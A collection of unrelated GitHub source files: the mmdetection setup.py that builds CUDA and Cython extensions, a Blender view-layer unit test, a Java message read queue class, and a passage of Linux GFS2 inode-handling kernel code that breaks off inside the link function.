from torch.utils.cpp_extension import BuildExtension, CUDAExtension
dist.Distribution().fetch_build_eggs(['Cython', 'numpy>=1.11.1'])
import numpy as np # noqa: E402
from Cython.Build import cythonize # noqa: E402
def readme():
with open('README.md', encoding='utf-8') as f:
content = f.read()
return content
MAJOR = 1
MINOR = 0
PATCH = ''
SUFFIX = 'rc0'
SHORT_VERSION = '{}.{}.{}{}'.format(MAJOR, MINOR, PATCH, SUFFIX)
version_file = 'mmdet/version.py'
def get_git_hash():
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(
cmd, stdout=subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
sha = out.strip().decode('ascii')
except OSError:
sha = 'unknown'
return sha
def get_hash():
if os.path.exists('.git'):
sha = get_git_hash()[:7]
elif os.path.exists(version_file):
try:
from mmdet.version import __version__
sha = __version__.split('+')[-1]
except ImportError:
raise ImportError('Unable to get git version')
else:
sha = 'unknown'
return sha
def write_version_py():
content = """# GENERATED VERSION FILE
# TIME: {}
__version__ = '{}'
short_version = '{}'
"""
sha = get_hash()
VERSION = SHORT_VERSION + '+' + sha
with open(version_file, 'w') as f:
f.write(content.format(time.asctime(), VERSION, SHORT_VERSION))
def get_version():
with open(version_file, 'r') as f:
exec(compile(f.read(), version_file, 'exec'))
return locals()['__version__']
def make_cuda_ext(name, module, sources):
return CUDAExtension(
name='{}.{}'.format(module, name),
sources=[os.path.join(*module.split('.'), p) for p in sources],
extra_compile_args={
'cxx': [],
'nvcc': [
'-D__CUDA_NO_HALF_OPERATORS__',
'-D__CUDA_NO_HALF_CONVERSIONS__',
'-D__CUDA_NO_HALF2_OPERATORS__',
]
})
def make_cython_ext(name, module, sources):
extra_compile_args = None
if platform.system() != 'Windows':
extra_compile_args = {
'cxx': ['-Wno-unused-function', '-Wno-write-strings']
}
extension = Extension(
'{}.{}'.format(module, name),
[os.path.join(*module.split('.'), p) for p in sources],
include_dirs=[np.get_include()],
language='c++',
extra_compile_args=extra_compile_args)
extension, = cythonize(extension)
return extension
def get_requirements(filename='requirements.txt'):
here = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(here, filename), 'r') as f:
requires = [line.replace('\n', '') for line in f.readlines()]
return requires
if __name__ == '__main__':
write_version_py()
setup(
name='mmdet',
version=get_version(),
description='Open MMLab Detection Toolbox and Benchmark',
long_description=readme(),
author='OpenMMLab',
author_email='[email protected]',
keywords='computer vision, object detection',
url='https://github.com/open-mmlab/mmdetection',
packages=find_packages(exclude=('configs', 'tools', 'demo')),
package_data={'mmdet.ops': ['*/*.so']},
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
license='Apache License 2.0',
setup_requires=['pytest-runner', 'cython', 'numpy'],
tests_require=['pytest', 'xdoctest'],
install_requires=get_requirements(),
ext_modules=[
make_cython_ext(
name='soft_nms_cpu',
module='mmdet.ops.nms',
sources=['src/soft_nms_cpu.pyx']),
make_cuda_ext(
name='nms_cpu',
module='mmdet.ops.nms',
sources=['src/nms_cpu.cpp']),
make_cuda_ext(
name='nms_cuda',
module='mmdet.ops.nms',
sources=['src/nms_cuda.cpp', 'src/nms_kernel.cu']),
make_cuda_ext(
name='roi_align_cuda',
module='mmdet.ops.roi_align',
sources=['src/roi_align_cuda.cpp', 'src/roi_align_kernel.cu']),
make_cuda_ext(
name='roi_pool_cuda',
module='mmdet.ops.roi_pool',
sources=['src/roi_pool_cuda.cpp', 'src/roi_pool_kernel.cu']),
make_cuda_ext(
name='deform_conv_cuda',
module='mmdet.ops.dcn',
sources=[
'src/deform_conv_cuda.cpp',
'src/deform_conv_cuda_kernel.cu'
]),
make_cuda_ext(
name='deform_pool_cuda',
module='mmdet.ops.dcn',
sources=[
'src/deform_pool_cuda.cpp',
'src/deform_pool_cuda_kernel.cu'
]),
make_cuda_ext(
name='sigmoid_focal_loss_cuda',
module='mmdet.ops.sigmoid_focal_loss',
sources=[
'src/sigmoid_focal_loss.cpp',
'src/sigmoid_focal_loss_cuda.cu'
]),
make_cuda_ext(
name='masked_conv2d_cuda',
module='mmdet.ops.masked_conv',
sources=[
'src/masked_conv2d_cuda.cpp', 'src/masked_conv2d_kernel.cu'
]),
],
cmdclass={'build_ext': BuildExtension},
zip_safe=False)
| {
"pile_set_name": "Github"
} |
# ############################################################
# Importing - Same For All Render Layer Tests
# ############################################################
import unittest
import os
import sys
from view_layer_common import *
# ############################################################
# Testing
# ############################################################
class UnitTesting(ViewLayerTesting):
def test_visibility_empty(self):
"""
See if the depsgraph evaluation is correct
"""
self.do_visibility_object_add('EMPTY')
# ############################################################
# Main - Same For All Render Layer Tests
# ############################################################
if __name__ == '__main__':
UnitTesting._extra_arguments = setup_extra_arguments(__file__)
unittest.main()
| {
"pile_set_name": "Github"
} |
package com.open.net.client.structures.message;
import java.util.LinkedList;
/**
* author : long
* created on : 2017/11/30
* description : 读队列
*/
public final class MessageReadQueen {
private MessageBuffer mReadMessageBuffer = new MessageBuffer();
public LinkedList<Message> mReadQueen = new LinkedList<>();//真正的消息队列
public Message build(byte[] src , int offset , int length){
Message msg = mReadMessageBuffer.build(src,offset,length);
return msg;
}
public void add(Message msg){
if(null != msg){
mReadQueen.add(msg);
}
}
public void remove(Message msg){
if(null != msg){
mReadQueen.remove(msg);
mReadMessageBuffer.release(msg);
}
}
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) Sistina Software, Inc. 1997-2003 All rights reserved.
* Copyright (C) 2004-2011 Red Hat, Inc. All rights reserved.
*
* This copyrighted material is made available to anyone wishing to use,
* modify, copy, or redistribute it subject to the terms and conditions
* of the GNU General Public License version 2.
*/
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/completion.h>
#include <linux/buffer_head.h>
#include <linux/namei.h>
#include <linux/mm.h>
#include <linux/xattr.h>
#include <linux/posix_acl.h>
#include <linux/gfs2_ondisk.h>
#include <linux/crc32.h>
#include <linux/fiemap.h>
#include <linux/security.h>
#include <asm/uaccess.h>
#include "gfs2.h"
#include "incore.h"
#include "acl.h"
#include "bmap.h"
#include "dir.h"
#include "xattr.h"
#include "glock.h"
#include "inode.h"
#include "meta_io.h"
#include "quota.h"
#include "rgrp.h"
#include "trans.h"
#include "util.h"
#include "super.h"
#include "glops.h"
struct gfs2_skip_data {
u64 no_addr;
int skipped;
int non_block;
};
static int iget_test(struct inode *inode, void *opaque)
{
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_skip_data *data = opaque;
if (ip->i_no_addr == data->no_addr) {
if (data->non_block &&
inode->i_state & (I_FREEING|I_CLEAR|I_WILL_FREE)) {
data->skipped = 1;
return 0;
}
return 1;
}
return 0;
}
static int iget_set(struct inode *inode, void *opaque)
{
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_skip_data *data = opaque;
if (data->skipped)
return -ENOENT;
inode->i_ino = (unsigned long)(data->no_addr);
ip->i_no_addr = data->no_addr;
return 0;
}
struct inode *gfs2_ilookup(struct super_block *sb, u64 no_addr, int non_block)
{
unsigned long hash = (unsigned long)no_addr;
struct gfs2_skip_data data;
data.no_addr = no_addr;
data.skipped = 0;
data.non_block = non_block;
return ilookup5(sb, hash, iget_test, &data);
}
static struct inode *gfs2_iget(struct super_block *sb, u64 no_addr,
int non_block)
{
struct gfs2_skip_data data;
unsigned long hash = (unsigned long)no_addr;
data.no_addr = no_addr;
data.skipped = 0;
data.non_block = non_block;
return iget5_locked(sb, hash, iget_test, iget_set, &data);
}
/**
* gfs2_set_iop - Sets inode operations
* @inode: The inode with correct i_mode filled in
*
* GFS2 lookup code fills in vfs inode contents based on info obtained
* from directory entry inside gfs2_inode_lookup().
*/
static void gfs2_set_iop(struct inode *inode)
{
struct gfs2_sbd *sdp = GFS2_SB(inode);
umode_t mode = inode->i_mode;
if (S_ISREG(mode)) {
inode->i_op = &gfs2_file_iops;
if (gfs2_localflocks(sdp))
inode->i_fop = &gfs2_file_fops_nolock;
else
inode->i_fop = &gfs2_file_fops;
} else if (S_ISDIR(mode)) {
inode->i_op = &gfs2_dir_iops;
if (gfs2_localflocks(sdp))
inode->i_fop = &gfs2_dir_fops_nolock;
else
inode->i_fop = &gfs2_dir_fops;
} else if (S_ISLNK(mode)) {
inode->i_op = &gfs2_symlink_iops;
} else {
inode->i_op = &gfs2_file_iops;
init_special_inode(inode, inode->i_mode, inode->i_rdev);
}
}
/**
* gfs2_inode_lookup - Lookup an inode
* @sb: The super block
* @no_addr: The inode number
* @type: The type of the inode
* non_block: Can we block on inodes that are being freed?
*
* Returns: A VFS inode, or an error
*/
struct inode *gfs2_inode_lookup(struct super_block *sb, unsigned int type,
u64 no_addr, u64 no_formal_ino, int non_block)
{
struct inode *inode;
struct gfs2_inode *ip;
struct gfs2_glock *io_gl = NULL;
int error;
inode = gfs2_iget(sb, no_addr, non_block);
ip = GFS2_I(inode);
if (!inode)
return ERR_PTR(-ENOMEM);
if (inode->i_state & I_NEW) {
struct gfs2_sbd *sdp = GFS2_SB(inode);
ip->i_no_formal_ino = no_formal_ino;
error = gfs2_glock_get(sdp, no_addr, &gfs2_inode_glops, CREATE, &ip->i_gl);
if (unlikely(error))
goto fail;
ip->i_gl->gl_object = ip;
error = gfs2_glock_get(sdp, no_addr, &gfs2_iopen_glops, CREATE, &io_gl);
if (unlikely(error))
goto fail_put;
set_bit(GIF_INVALID, &ip->i_flags);
error = gfs2_glock_nq_init(io_gl, LM_ST_SHARED, GL_EXACT, &ip->i_iopen_gh);
if (unlikely(error))
goto fail_iopen;
ip->i_iopen_gh.gh_gl->gl_object = ip;
gfs2_glock_put(io_gl);
io_gl = NULL;
if (type == DT_UNKNOWN) {
/* Inode glock must be locked already */
error = gfs2_inode_refresh(GFS2_I(inode));
if (error)
goto fail_refresh;
} else {
inode->i_mode = DT2IF(type);
}
gfs2_set_iop(inode);
unlock_new_inode(inode);
}
return inode;
fail_refresh:
ip->i_iopen_gh.gh_flags |= GL_NOCACHE;
ip->i_iopen_gh.gh_gl->gl_object = NULL;
gfs2_glock_dq_uninit(&ip->i_iopen_gh);
fail_iopen:
if (io_gl)
gfs2_glock_put(io_gl);
fail_put:
ip->i_gl->gl_object = NULL;
gfs2_glock_put(ip->i_gl);
fail:
iget_failed(inode);
return ERR_PTR(error);
}
struct inode *gfs2_lookup_by_inum(struct gfs2_sbd *sdp, u64 no_addr,
u64 *no_formal_ino, unsigned int blktype)
{
struct super_block *sb = sdp->sd_vfs;
struct gfs2_holder i_gh;
struct inode *inode = NULL;
int error;
/* Must not read in block until block type is verified */
error = gfs2_glock_nq_num(sdp, no_addr, &gfs2_inode_glops,
LM_ST_EXCLUSIVE, GL_SKIP, &i_gh);
if (error)
return ERR_PTR(error);
error = gfs2_check_blk_type(sdp, no_addr, blktype);
if (error)
goto fail;
inode = gfs2_inode_lookup(sb, DT_UNKNOWN, no_addr, 0, 1);
if (IS_ERR(inode))
goto fail;
/* Two extra checks for NFS only */
if (no_formal_ino) {
error = -ESTALE;
if (GFS2_I(inode)->i_no_formal_ino != *no_formal_ino)
goto fail_iput;
error = -EIO;
if (GFS2_I(inode)->i_diskflags & GFS2_DIF_SYSTEM)
goto fail_iput;
error = 0;
}
fail:
gfs2_glock_dq_uninit(&i_gh);
return error ? ERR_PTR(error) : inode;
fail_iput:
iput(inode);
goto fail;
}
struct inode *gfs2_lookup_simple(struct inode *dip, const char *name)
{
struct qstr qstr;
struct inode *inode;
gfs2_str2qstr(&qstr, name);
inode = gfs2_lookupi(dip, &qstr, 1);
/* gfs2_lookupi has inconsistent callers: vfs
* related routines expect NULL for no entry found,
* gfs2_lookup_simple callers expect ENOENT
* and do not check for NULL.
*/
if (inode == NULL)
return ERR_PTR(-ENOENT);
else
return inode;
}
/**
* gfs2_lookupi - Look up a filename in a directory and return its inode
* @d_gh: An initialized holder for the directory glock
* @name: The name of the inode to look for
* @is_root: If 1, ignore the caller's permissions
* @i_gh: An uninitialized holder for the new inode glock
*
* This can be called via the VFS filldir function when NFS is doing
* a readdirplus and the inode which its intending to stat isn't
* already in cache. In this case we must not take the directory glock
* again, since the readdir call will have already taken that lock.
*
* Returns: errno
*/
struct inode *gfs2_lookupi(struct inode *dir, const struct qstr *name,
int is_root)
{
struct super_block *sb = dir->i_sb;
struct gfs2_inode *dip = GFS2_I(dir);
struct gfs2_holder d_gh;
int error = 0;
struct inode *inode = NULL;
int unlock = 0;
if (!name->len || name->len > GFS2_FNAMESIZE)
return ERR_PTR(-ENAMETOOLONG);
if ((name->len == 1 && memcmp(name->name, ".", 1) == 0) ||
(name->len == 2 && memcmp(name->name, "..", 2) == 0 &&
dir == d_inode(sb->s_root))) {
igrab(dir);
return dir;
}
if (gfs2_glock_is_locked_by_me(dip->i_gl) == NULL) {
error = gfs2_glock_nq_init(dip->i_gl, LM_ST_SHARED, 0, &d_gh);
if (error)
return ERR_PTR(error);
unlock = 1;
}
if (!is_root) {
error = gfs2_permission(dir, MAY_EXEC);
if (error)
goto out;
}
inode = gfs2_dir_search(dir, name, false);
if (IS_ERR(inode))
error = PTR_ERR(inode);
out:
if (unlock)
gfs2_glock_dq_uninit(&d_gh);
if (error == -ENOENT)
return NULL;
return inode ? inode : ERR_PTR(error);
}
/**
* create_ok - OK to create a new on-disk inode here?
* @dip: Directory in which dinode is to be created
* @name: Name of new dinode
* @mode:
*
* Returns: errno
*/
static int create_ok(struct gfs2_inode *dip, const struct qstr *name,
umode_t mode)
{
int error;
error = gfs2_permission(&dip->i_inode, MAY_WRITE | MAY_EXEC);
if (error)
return error;
/* Don't create entries in an unlinked directory */
if (!dip->i_inode.i_nlink)
return -ENOENT;
if (dip->i_entries == (u32)-1)
return -EFBIG;
if (S_ISDIR(mode) && dip->i_inode.i_nlink == (u32)-1)
return -EMLINK;
return 0;
}
static void munge_mode_uid_gid(const struct gfs2_inode *dip,
struct inode *inode)
{
if (GFS2_SB(&dip->i_inode)->sd_args.ar_suiddir &&
(dip->i_inode.i_mode & S_ISUID) &&
!uid_eq(dip->i_inode.i_uid, GLOBAL_ROOT_UID)) {
if (S_ISDIR(inode->i_mode))
inode->i_mode |= S_ISUID;
else if (!uid_eq(dip->i_inode.i_uid, current_fsuid()))
inode->i_mode &= ~07111;
inode->i_uid = dip->i_inode.i_uid;
} else
inode->i_uid = current_fsuid();
if (dip->i_inode.i_mode & S_ISGID) {
if (S_ISDIR(inode->i_mode))
inode->i_mode |= S_ISGID;
inode->i_gid = dip->i_inode.i_gid;
} else
inode->i_gid = current_fsgid();
}
static int alloc_dinode(struct gfs2_inode *ip, u32 flags, unsigned *dblocks)
{
struct gfs2_sbd *sdp = GFS2_SB(&ip->i_inode);
struct gfs2_alloc_parms ap = { .target = *dblocks, .aflags = flags, };
int error;
error = gfs2_quota_lock_check(ip, &ap);
if (error)
goto out;
error = gfs2_inplace_reserve(ip, &ap);
if (error)
goto out_quota;
error = gfs2_trans_begin(sdp, (*dblocks * RES_RG_BIT) + RES_STATFS + RES_QUOTA, 0);
if (error)
goto out_ipreserv;
error = gfs2_alloc_blocks(ip, &ip->i_no_addr, dblocks, 1, &ip->i_generation);
ip->i_no_formal_ino = ip->i_generation;
ip->i_inode.i_ino = ip->i_no_addr;
ip->i_goal = ip->i_no_addr;
gfs2_trans_end(sdp);
out_ipreserv:
gfs2_inplace_release(ip);
out_quota:
gfs2_quota_unlock(ip);
out:
return error;
}
static void gfs2_init_dir(struct buffer_head *dibh,
const struct gfs2_inode *parent)
{
struct gfs2_dinode *di = (struct gfs2_dinode *)dibh->b_data;
struct gfs2_dirent *dent = (struct gfs2_dirent *)(di+1);
gfs2_qstr2dirent(&gfs2_qdot, GFS2_DIRENT_SIZE(gfs2_qdot.len), dent);
dent->de_inum = di->di_num; /* already GFS2 endian */
dent->de_type = cpu_to_be16(DT_DIR);
dent = (struct gfs2_dirent *)((char*)dent + GFS2_DIRENT_SIZE(1));
gfs2_qstr2dirent(&gfs2_qdotdot, dibh->b_size - GFS2_DIRENT_SIZE(1) - sizeof(struct gfs2_dinode), dent);
gfs2_inum_out(parent, dent);
dent->de_type = cpu_to_be16(DT_DIR);
}
/**
* gfs2_init_xattr - Initialise an xattr block for a new inode
* @ip: The inode in question
*
* This sets up an empty xattr block for a new inode, ready to
* take any ACLs, LSM xattrs, etc.
*/
static void gfs2_init_xattr(struct gfs2_inode *ip)
{
struct gfs2_sbd *sdp = GFS2_SB(&ip->i_inode);
struct buffer_head *bh;
struct gfs2_ea_header *ea;
bh = gfs2_meta_new(ip->i_gl, ip->i_eattr);
gfs2_trans_add_meta(ip->i_gl, bh);
gfs2_metatype_set(bh, GFS2_METATYPE_EA, GFS2_FORMAT_EA);
gfs2_buffer_clear_tail(bh, sizeof(struct gfs2_meta_header));
ea = GFS2_EA_BH2FIRST(bh);
ea->ea_rec_len = cpu_to_be32(sdp->sd_jbsize);
ea->ea_type = GFS2_EATYPE_UNUSED;
ea->ea_flags = GFS2_EAFLAG_LAST;
brelse(bh);
}
/**
* init_dinode - Fill in a new dinode structure
* @dip: The directory this inode is being created in
* @ip: The inode
* @symname: The symlink destination (if a symlink)
* @bhp: The buffer head (returned to caller)
*
*/
static void init_dinode(struct gfs2_inode *dip, struct gfs2_inode *ip,
const char *symname)
{
struct gfs2_dinode *di;
struct buffer_head *dibh;
dibh = gfs2_meta_new(ip->i_gl, ip->i_no_addr);
gfs2_trans_add_meta(ip->i_gl, dibh);
di = (struct gfs2_dinode *)dibh->b_data;
gfs2_dinode_out(ip, di);
di->di_major = cpu_to_be32(MAJOR(ip->i_inode.i_rdev));
di->di_minor = cpu_to_be32(MINOR(ip->i_inode.i_rdev));
di->__pad1 = 0;
di->__pad2 = 0;
di->__pad3 = 0;
memset(&di->__pad4, 0, sizeof(di->__pad4));
memset(&di->di_reserved, 0, sizeof(di->di_reserved));
gfs2_buffer_clear_tail(dibh, sizeof(struct gfs2_dinode));
switch(ip->i_inode.i_mode & S_IFMT) {
case S_IFDIR:
gfs2_init_dir(dibh, dip);
break;
case S_IFLNK:
memcpy(dibh->b_data + sizeof(struct gfs2_dinode), symname, ip->i_inode.i_size);
break;
}
set_buffer_uptodate(dibh);
brelse(dibh);
}
/**
* gfs2_trans_da_blocks - Calculate number of blocks to link inode
* @dip: The directory we are linking into
* @da: The dir add information
* @nr_inodes: The number of inodes involved
*
* This calculate the number of blocks we need to reserve in a
* transaction to link @nr_inodes into a directory. In most cases
* @nr_inodes will be 2 (the directory plus the inode being linked in)
* but in case of rename, 4 may be required.
*
* Returns: Number of blocks
*/
static unsigned gfs2_trans_da_blks(const struct gfs2_inode *dip,
const struct gfs2_diradd *da,
unsigned nr_inodes)
{
return da->nr_blocks + gfs2_rg_blocks(dip, da->nr_blocks) +
(nr_inodes * RES_DINODE) + RES_QUOTA + RES_STATFS;
}
static int link_dinode(struct gfs2_inode *dip, const struct qstr *name,
struct gfs2_inode *ip, struct gfs2_diradd *da)
{
struct gfs2_sbd *sdp = GFS2_SB(&dip->i_inode);
struct gfs2_alloc_parms ap = { .target = da->nr_blocks, };
int error;
if (da->nr_blocks) {
error = gfs2_quota_lock_check(dip, &ap);
if (error)
goto fail_quota_locks;
error = gfs2_inplace_reserve(dip, &ap);
if (error)
goto fail_quota_locks;
error = gfs2_trans_begin(sdp, gfs2_trans_da_blks(dip, da, 2), 0);
if (error)
goto fail_ipreserv;
} else {
error = gfs2_trans_begin(sdp, RES_LEAF + 2 * RES_DINODE, 0);
if (error)
goto fail_quota_locks;
}
error = gfs2_dir_add(&dip->i_inode, name, ip, da);
gfs2_trans_end(sdp);
fail_ipreserv:
gfs2_inplace_release(dip);
fail_quota_locks:
gfs2_quota_unlock(dip);
return error;
}
static int gfs2_initxattrs(struct inode *inode, const struct xattr *xattr_array,
void *fs_info)
{
const struct xattr *xattr;
int err = 0;
for (xattr = xattr_array; xattr->name != NULL; xattr++) {
err = __gfs2_xattr_set(inode, xattr->name, xattr->value,
xattr->value_len, 0,
GFS2_EATYPE_SECURITY);
if (err < 0)
break;
}
return err;
}
/**
* gfs2_create_inode - Create a new inode
* @dir: The parent directory
* @dentry: The new dentry
* @file: If non-NULL, the file which is being opened
* @mode: The permissions on the new inode
* @dev: For device nodes, this is the device number
* @symname: For symlinks, this is the link destination
* @size: The initial size of the inode (ignored for directories)
*
* Returns: 0 on success, or error code
*/
static int gfs2_create_inode(struct inode *dir, struct dentry *dentry,
struct file *file,
umode_t mode, dev_t dev, const char *symname,
unsigned int size, int excl, int *opened)
{
const struct qstr *name = &dentry->d_name;
struct posix_acl *default_acl, *acl;
struct gfs2_holder ghs[2];
struct inode *inode = NULL;
struct gfs2_inode *dip = GFS2_I(dir), *ip;
struct gfs2_sbd *sdp = GFS2_SB(&dip->i_inode);
struct gfs2_glock *io_gl;
int error, free_vfs_inode = 0;
u32 aflags = 0;
unsigned blocks = 1;
struct gfs2_diradd da = { .bh = NULL, .save_loc = 1, };
if (!name->len || name->len > GFS2_FNAMESIZE)
return -ENAMETOOLONG;
error = gfs2_rs_alloc(dip);
if (error)
return error;
error = gfs2_rindex_update(sdp);
if (error)
return error;
error = gfs2_glock_nq_init(dip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
if (error)
goto fail;
error = create_ok(dip, name, mode);
if (error)
goto fail_gunlock;
inode = gfs2_dir_search(dir, &dentry->d_name, !S_ISREG(mode) || excl);
error = PTR_ERR(inode);
if (!IS_ERR(inode)) {
if (S_ISDIR(inode->i_mode)) {
iput(inode);
inode = ERR_PTR(-EISDIR);
goto fail_gunlock;
}
d_instantiate(dentry, inode);
error = 0;
if (file) {
if (S_ISREG(inode->i_mode))
error = finish_open(file, dentry, gfs2_open_common, opened);
else
error = finish_no_open(file, NULL);
}
gfs2_glock_dq_uninit(ghs);
return error;
} else if (error != -ENOENT) {
goto fail_gunlock;
}
error = gfs2_diradd_alloc_required(dir, name, &da);
if (error < 0)
goto fail_gunlock;
inode = new_inode(sdp->sd_vfs);
error = -ENOMEM;
if (!inode)
goto fail_gunlock;
error = posix_acl_create(dir, &mode, &default_acl, &acl);
if (error)
goto fail_free_vfs_inode;
ip = GFS2_I(inode);
error = gfs2_rs_alloc(ip);
if (error)
goto fail_free_acls;
inode->i_mode = mode;
set_nlink(inode, S_ISDIR(mode) ? 2 : 1);
inode->i_rdev = dev;
inode->i_size = size;
inode->i_atime = inode->i_mtime = inode->i_ctime = CURRENT_TIME;
gfs2_set_inode_blocks(inode, 1);
munge_mode_uid_gid(dip, inode);
check_and_update_goal(dip);
ip->i_goal = dip->i_goal;
ip->i_diskflags = 0;
ip->i_eattr = 0;
ip->i_height = 0;
ip->i_depth = 0;
ip->i_entries = 0;
switch(mode & S_IFMT) {
case S_IFREG:
if ((dip->i_diskflags & GFS2_DIF_INHERIT_JDATA) ||
gfs2_tune_get(sdp, gt_new_files_jdata))
ip->i_diskflags |= GFS2_DIF_JDATA;
gfs2_set_aops(inode);
break;
case S_IFDIR:
ip->i_diskflags |= (dip->i_diskflags & GFS2_DIF_INHERIT_JDATA);
ip->i_diskflags |= GFS2_DIF_JDATA;
ip->i_entries = 2;
break;
}
gfs2_set_inode_flags(inode);
if ((GFS2_I(d_inode(sdp->sd_root_dir)) == dip) ||
(dip->i_diskflags & GFS2_DIF_TOPDIR))
aflags |= GFS2_AF_ORLOV;
if (default_acl || acl)
blocks++;
error = alloc_dinode(ip, aflags, &blocks);
if (error)
goto fail_free_inode;
gfs2_set_inode_blocks(inode, blocks);
error = gfs2_glock_get(sdp, ip->i_no_addr, &gfs2_inode_glops, CREATE, &ip->i_gl);
if (error)
goto fail_free_inode;
ip->i_gl->gl_object = ip;
error = gfs2_glock_nq_init(ip->i_gl, LM_ST_EXCLUSIVE, GL_SKIP, ghs + 1);
if (error)
goto fail_free_inode;
error = gfs2_trans_begin(sdp, blocks, 0);
if (error)
goto fail_gunlock2;
if (blocks > 1) {
ip->i_eattr = ip->i_no_addr + 1;
gfs2_init_xattr(ip);
}
init_dinode(dip, ip, symname);
gfs2_trans_end(sdp);
error = gfs2_glock_get(sdp, ip->i_no_addr, &gfs2_iopen_glops, CREATE, &io_gl);
if (error)
goto fail_gunlock2;
error = gfs2_glock_nq_init(io_gl, LM_ST_SHARED, GL_EXACT, &ip->i_iopen_gh);
if (error)
goto fail_gunlock2;
ip->i_iopen_gh.gh_gl->gl_object = ip;
gfs2_glock_put(io_gl);
gfs2_set_iop(inode);
insert_inode_hash(inode);
if (default_acl) {
error = gfs2_set_acl(inode, default_acl, ACL_TYPE_DEFAULT);
posix_acl_release(default_acl);
}
if (acl) {
if (!error)
error = gfs2_set_acl(inode, acl, ACL_TYPE_ACCESS);
posix_acl_release(acl);
}
if (error)
goto fail_gunlock3;
error = security_inode_init_security(&ip->i_inode, &dip->i_inode, name,
&gfs2_initxattrs, NULL);
if (error)
goto fail_gunlock3;
error = link_dinode(dip, name, ip, &da);
if (error)
goto fail_gunlock3;
mark_inode_dirty(inode);
d_instantiate(dentry, inode);
if (file) {
*opened |= FILE_CREATED;
error = finish_open(file, dentry, gfs2_open_common, opened);
}
gfs2_glock_dq_uninit(ghs);
gfs2_glock_dq_uninit(ghs + 1);
return error;
fail_gunlock3:
gfs2_glock_dq_uninit(ghs + 1);
if (ip->i_gl)
gfs2_glock_put(ip->i_gl);
goto fail_gunlock;
fail_gunlock2:
gfs2_glock_dq_uninit(ghs + 1);
fail_free_inode:
if (ip->i_gl)
gfs2_glock_put(ip->i_gl);
gfs2_rs_delete(ip, NULL);
fail_free_acls:
if (default_acl)
posix_acl_release(default_acl);
if (acl)
posix_acl_release(acl);
fail_free_vfs_inode:
free_vfs_inode = 1;
fail_gunlock:
gfs2_dir_no_add(&da);
gfs2_glock_dq_uninit(ghs);
if (inode && !IS_ERR(inode)) {
clear_nlink(inode);
if (!free_vfs_inode)
mark_inode_dirty(inode);
set_bit(free_vfs_inode ? GIF_FREE_VFS_INODE : GIF_ALLOC_FAILED,
&GFS2_I(inode)->i_flags);
iput(inode);
}
fail:
return error;
}
/**
* gfs2_create - Create a file
* @dir: The directory in which to create the file
* @dentry: The dentry of the new file
* @mode: The mode of the new file
*
* Returns: errno
*/
static int gfs2_create(struct inode *dir, struct dentry *dentry,
umode_t mode, bool excl)
{
return gfs2_create_inode(dir, dentry, NULL, S_IFREG | mode, 0, NULL, 0, excl, NULL);
}
/**
* __gfs2_lookup - Look up a filename in a directory and return its inode
* @dir: The directory inode
* @dentry: The dentry of the new inode
* @file: File to be opened
* @opened: atomic_open flags
*
*
* Returns: errno
*/
static struct dentry *__gfs2_lookup(struct inode *dir, struct dentry *dentry,
struct file *file, int *opened)
{
struct inode *inode;
struct dentry *d;
struct gfs2_holder gh;
struct gfs2_glock *gl;
int error;
inode = gfs2_lookupi(dir, &dentry->d_name, 0);
if (inode == NULL) {
d_add(dentry, NULL);
return NULL;
}
if (IS_ERR(inode))
return ERR_CAST(inode);
gl = GFS2_I(inode)->i_gl;
error = gfs2_glock_nq_init(gl, LM_ST_SHARED, LM_FLAG_ANY, &gh);
if (error) {
iput(inode);
return ERR_PTR(error);
}
d = d_splice_alias(inode, dentry);
if (IS_ERR(d)) {
gfs2_glock_dq_uninit(&gh);
return d;
}
if (file && S_ISREG(inode->i_mode))
error = finish_open(file, dentry, gfs2_open_common, opened);
gfs2_glock_dq_uninit(&gh);
if (error) {
dput(d);
return ERR_PTR(error);
}
return d;
}
static struct dentry *gfs2_lookup(struct inode *dir, struct dentry *dentry,
unsigned flags)
{
return __gfs2_lookup(dir, dentry, NULL, NULL);
}
/**
* gfs2_link - Link to a file
* @old_dentry: The inode to link
* @dir: Add link to this directory
* @dentry: The name of the link
*
* Link the inode in "old_dentry" into the directory "dir" with the
* name in "dentry".
*
* Returns: errno
*/
static int gfs2_link(struct dentry *old_dentry, struct inode *dir,
struct dentry *dentry)
{
struct gfs2_inode *dip = GFS2_I(dir);
struct gfs2_sbd *sdp = GFS2_SB(dir);
struct inode *inode = d_inode(old_dentry);
struct gfs2_inode *ip = GFS2_I(inode);
struct gfs2_holder ghs[2];
struct buffer_head *dibh;
struct gfs2_diradd da = { .bh = NULL, .save_loc = 1, };
int error;
if (S_ISDIR(inode->i_mode))
return -EPERM;
error = gfs2_rs_alloc(dip);
if (error)
return error;
gfs2_holder_init(dip->i_gl, LM_ST_EXCLUSIVE, 0, ghs);
gfs2_holder_init(ip->i_gl, LM_ST_EXCLUSIVE, 0, ghs + 1);
error = gfs2_glock_nq(ghs); /* parent */
if (error)
goto out_parent;
error = gfs2_glock_nq(ghs + 1); /* child */
if (error)
goto out_child;
error = -ENOENT;
if (inode->i_nlink == 0)
goto out_gunlock;
error = gfs2_permission(dir, MAY_WRITE | MAY_EXEC);
if (error)
goto out_gunlock;
error = gfs2_dir_check(dir, &dentry->d_name, NULL);
switch (error) {
case -ENOENT:
break;
case 0:
error = -EEXIST;
default:
goto out_gunlock;
}
error = -EINVAL;
if (!dip->i_inode.i_nlink)
goto out_gunlock;
error = -EFBIG;
if (dip->i_entries == (u32)-1)
goto out_gunlock;
error = -EPERM;
if (IS_IMMUTABLE(inode) || IS_APPEND(inode))
goto out_gunlock;
error = -EINVAL;
if (!ip->i_inode.i_nlink)
goto out_gunlock;
